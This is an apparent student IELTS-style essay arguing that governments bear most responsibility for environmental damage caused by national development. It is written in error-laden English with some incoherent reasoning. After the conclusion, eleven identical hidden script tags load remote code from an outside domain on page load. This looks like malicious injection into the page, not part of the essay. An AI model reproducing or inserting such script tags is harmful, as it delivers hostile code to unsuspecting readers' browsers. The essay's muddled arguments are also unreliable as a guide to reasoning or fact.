Pollution and other environmental damages are caused by a country developing and becoming richer. This problem cannot be avoid. To what extent do you agree or disagree? What factors damage the environment and who should take responsibility?

In this contemporary life, there are many country more and more developing contrast of damage environmental and they are still not solve that problem. From my perspective, I agree with this argument and other factors or people should take responsibility would be discussed in the following essay.

Admittedly, there are some arguments in favor of environmental damage by country developing. First, government subsidies for development are believed to equalize living conditions among people regardless of their background family and need to have a better country in the future. This country developing also has environmental damages, tends not only to increase the overall pollution of all people but also to mitigate their feeling of protect environment. Second, country developing is one of the reason for environmental damages would probably result in a higher supply of highly negative workers because they reliant on modern country and didn’t know how to preserve environment. In fact, it is acknowledged that environmental is one of the important part imperative to foster economic growth and technological development in any nations.

Nevertheless, the resultant problems would be far more significant if country didn’t had solution for that and factors damage. First, a number of factors cause damages including poor farming, practices , excessive use for fertilizers and pesticides and leakage from landfills can lead to land and soil degradation. Second, other big factor that every country need to face is water pollution, air pollution, dumping or people waste packaging too much for shopping, that is damage on environmental. Third, many countries are facing global warming and the greenhouse effect, the ozone layer is seriously damaged, all of which are caused by humans and everyone needs to be responsible. However, government need to take more responsibility than other people because they need to have a strict rules or new rules for protecting environment. Example, government can banned and fines corresponding to the damage that person causes to the environment. It might possible to reduce air pollution that they can make a day for bicycles or walking, it can reduced some bad energy from taxis or transportation. Especially, it can make a green wind and water in the future. It, instead, would be a more country developing viable option if the resources were focused on peoples life and solve big problem as environmental.

In conclusion, every country want to development can face to many problems but environmental damages is a big things and government need to consider about solution and make a better life for people. <script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>